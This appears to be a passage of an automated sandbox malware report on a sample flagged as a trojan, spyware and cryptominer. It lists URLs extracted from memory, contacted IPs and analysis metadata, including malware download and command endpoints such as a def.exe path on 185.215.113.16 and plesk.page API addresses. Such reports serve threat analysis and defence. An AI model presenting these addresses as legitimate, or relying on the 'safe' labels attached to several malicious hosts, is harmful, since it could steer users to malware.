                              https://zealous-roentgen.66-63-187-122.pleEle.exe, 00000009.00000002.3318620989.0000000003656000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://letterdrive.shop/api1Swe44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433742017.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2415236247.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2467036443.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433969582.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2416120330.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506969643.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433409561.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452794151.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2416925448.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2418623510.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452825754.0000000005354000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.e44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000000A.00000003.2339462163.0000026F207A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.2339462163.0000026F207F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://letterdrive.shop/apibuRe44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506969643.0000000005354000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://letterdrive.shop:443/apiQhe44fda3216.exe, 0000000B.00000003.2440651482.0000000000623000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2439713957.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://letterdrive.shop/Ye44fda3216.exe, 0000000B.00000003.2466779696.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2476670946.0000000000605000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2475404002.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2451953024.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506333471.0000000000609000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://g.live.com/odclientsettings/Prod.C:svchost.exe, 0000000A.00000003.2339462163.0000026F20756000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtPsvchost.exe, 00000035.00000002.3326027564.0000022088243000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: phishing
                                    		unknown
                                    https://letterdrive.shop:443/apie44fda3216.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYie44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://nuget.org/nuget.exepowershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://letterdrive.shop/apiMSwhVze44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433742017.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2415236247.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2467036443.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433969582.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2416120330.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506969643.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433409561.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452794151.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2416925448.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2418623510.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452825754.0000000005354000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://letterdrive.shop/apibue44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506969643.0000000005354000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name9LbUK15.exe, 00000006.00000002.3336204963.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000009.00000002.3318620989.0000000003101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2541734851.000001F1E2221000.00000004.00000800.00020000.00000000.sdmp, NzL6O1Q.exe, 00000014.00000002.3318904370.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, NzL6O1Q.exe, 00000014.00000002.3318904370.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000015.00000002.2873162954.0000000003002000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000015.00000002.2873162954.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000015.00000002.2873162954.000000000302A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000000A.00000003.2339462163.0000026F207C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94e44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.innosetup.com/zjFtdxQ.exe, 0000000C.00000003.2406324189.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, zjFtdxQ.exe, 0000000C.00000003.2406604387.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, zjFtdxQ.tmp, 0000000D.00000000.2407228078.0000000000401000.00000020.00000001.01000000.00000014.sdmpfalse
                                                		high
                                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://docs.python.org/3/library/functools.html#functools.lru_cache._compat.pyc0.55.drfalse
                                                    		high
                                                    https://stackoverflow.com/q/14436606/23354Ele.exe, 00000009.00000002.3318620989.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmp, Ele.exe, 00000015.00000002.2873162954.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://letterdrive.shop/mfilJe44fda3216.exe, 0000000B.00000003.2466779696.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2476670946.0000000000605000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2475404002.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2451953024.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506333471.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2625395130.0000000000605000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2750455557.000000000060B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://contoso.com/Iconpowershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://crl.ver)svchost.exe, 0000000A.00000002.3339202766.0000026F20A0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctae44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.phpllsvchost.exe, 00000035.00000002.3317800557.0000022087A9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: phishing
                                                                      		unknown
                                                                      http://ocsp.rootca1.amazontrust.com0:e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016e44fda3216.exe, 0000000B.00000003.2403168009.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388530393.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2403414689.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388451454.00000000053A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.phpvohvtbtkkqqpcgvysvchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: phishing
                                                                          		unknown
                                                                          https://www.ecosia.org/newtab/e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bre44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://github.com/Zankop/baxter/raw/refs/heads/master/10279LbUK15.exe, 00000006.00000002.3336204963.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, 9LbUK15.exe, 00000006.00000000.2297604594.0000000000062000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                  		high
                                                                                  https://raw.githubusercontent.com9LbUK15.exe, 00000006.00000002.3336204963.000000000241A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.php--cinit-version=3.4.1--nicehashsvchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: phishing
                                                                                    		unknown
                                                                                    http://185.215.113.16:80/off/def.exee44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://185.215.113.16/off/def.exe;e44fda3216.exe, 0000000B.00000002.3295646287.00000000004FA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      http://zealous-roentgen.66-63-187-122.plesk.pageEle.exe, 00000009.00000002.3318620989.0000000003661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: phishing
                                                                                      		unknown
                                                                                      https://support.microsofe44fda3216.exe, 0000000B.00000003.2388451454.00000000053A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.php6svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: phishing
                                                                                          		unknown
                                                                                          http://185.215.113.16/off/def.exee44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3295906531.0000000000607000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplese44fda3216.exe, 0000000B.00000003.2388530393.0000000005375000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://185.215.113.16/off/def.exeExe44fda3216.exe, 0000000B.00000003.2765743260.0000000000618000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3295906531.0000000000607000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://raw.githubusercontent.com/Zankop/baxter/refs/heads/master/10279LbUK15.exe, 00000006.00000002.3336204963.000000000241A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://arstechnica.com/civis/viewtopic.php?f=19&t=465002._psosx.pyc.55.drfalse
                                                                                                  		high
                                                                                                  https://github.com/mgravell/protobuf-netJEle.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://zealous-roentgen.66-63-187-122.plesk.psvchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3315665185.0000022087A13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://zealous-roentgen.66-63-187-122.plesk.page/98.exeEle.exe, 00000009.00000002.3318620989.000000000326A000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000009.00000002.3318620989.0000000003101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: phishing
                                                                                                    		unknown
                                                                                                    https://github.com9LbUK15.exe, 00000006.00000002.3336204963.00000000023D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://contoso.com/Licensepowershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://docs.rs/getrandom#nodejs-es-module-supportregsvr32.exe, 00000011.00000002.3302250215.00007FFDF6E38000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                          		high
                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://letterdrive.shop/apise44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2467036443.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506969643.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452794151.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452825754.0000000005354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17e44fda3216.exe, 0000000B.00000003.2403168009.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388530393.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2403414689.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388451454.00000000053A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://letterdrive.shop/apipe44fda3216.exe, 0000000B.00000003.2452794151.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452825754.0000000005354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://go.mic5NzL6O1Q.exe, 0000001E.00000002.2504235326.00000000012BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://letterdrive.shop/1520e44fda3216.exe, 0000000B.00000003.2625395130.0000000000605000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://svn.red-bean.com/bob/macholib/trunk/macholib/db3cab6cee.exe, 00000037.00000003.2778721078.000001E1978C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://www.w3.NzL6O1Q.exe, 00000036.00000002.2660245911.0000000002BBD000.00000004.00000800.00020000.00000000.sdmp, NzL6O1Q.exe, 00000038.00000002.2772672234.0000000002B9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://g.live.com/odclientsettings/ProdV2svchost.exe, 0000000A.00000003.2339462163.0000026F207C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://github.com/mgravell/protobuf-netiEle.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://x1.c.lencr.org/0e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://x1.i.lencr.org/0e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://stackoverflow.com/q/11564914/23354;Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://letterdrive.shop/api~e44fda3216.exe, 0000000B.00000003.2403302819.0000000005346000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installe44fda3216.exe, 0000000B.00000003.2388530393.0000000005375000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searche44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://contoso.com/powershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://letterdrive.shop/e44fda3216.exe, 0000000B.00000003.2750455557.000000000060B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://letterdrive.shop/apiobe44fda3216.exe, 0000000B.00000003.2433409561.0000000005348000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtTaskmgr.exesvchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                              		unknown
                                                                                                                              https://support.mozilla.org/products/firefoxgro.alle44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtsvchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3317388206.0000022087A6A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: phishing
                                                                                                                                		unknown
                                                                                                                                http://crl.microPe44fda3216.exe, 0000000B.00000003.2506704362.00000000005FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://nuget.org/NuGet.exepowershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://letterdrive.shop/api$e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpge44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoe44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://letterdrive.shop/apieDUe44fda3216.exe, 0000000B.00000003.2451466201.0000000000618000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://letterdrive.shop/K0e44fda3216.exe, 0000000B.00000003.2440651482.0000000000623000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2439713957.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://github.com/mgravell/protobuf-netEle.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://letterdrive.shop/apie44fda3216.exe, e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2451466201.0000000000618000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433409561.0000000005348000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown

                                                                                                                                          World Map of Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public IPs

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          185.215.113.43
                                                                                                                                          		unknownPortugal
                                                                                                                                          		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                          172.217.18.14
                                                                                                                                          		unknownUnited States
                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                          185.215.113.16
                                                                                                                                          		unknownPortugal
                                                                                                                                          		206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                          140.82.121.4
                                                                                                                                          		unknownUnited States
                                                                                                                                          		36459GITHUBUSfalse
                                                                                                                                          192.248.189.11
                                                                                                                                          		unknownFrance
                                                                                                                                          		20473AS-CHOOPAUSfalse
                                                                                                                                          172.190.167.107
                                                                                                                                          		unknownUnited States
                                                                                                                                          		7018ATT-INTERNET4USfalse
                                                                                                                                          66.63.187.122
                                                                                                                                          		unknownUnited States
                                                                                                                                          		8100ASN-QUADRANET-GLOBALUSfalse
                                                                                                                                          104.21.36.11
                                                                                                                                          		unknownUnited States
                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                          185.157.162.216
                                                                                                                                          		unknownSweden
                                                                                                                                          		197595OBE-EUROPEObenetworkEuropeSEfalse
                                                                                                                                          23.56.254.164
                                                                                                                                          		unknownUnited States
                                                                                                                                          		42961GPRS-ASZAINKWfalse
                                                                                                                                          185.199.110.133
                                                                                                                                          		unknownNetherlands
                                                                                                                                          		54113FASTLYUSfalse
                                                                                                                                          31.41.244.11
                                                                                                                                          		unknownRussian Federation
                                                                                                                                          		61974AEROEXPRESS-ASRUfalse

                                                                                                                                          Private

                                                                                                                                          IP
                                                                                                                                          127.0.0.1

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1585651
                                                                                                                                          Start date and time:2025-01-07 23:42:11 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 12m 37s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Number of analysed new started processes analysed:57
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Sample name:file.exe
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.troj.adwa.spyw.expl.evad.mine.winEXE@83/1075@0/13
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 80%
                                                                                                                                          HCA Information:Failed
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                          Warnings

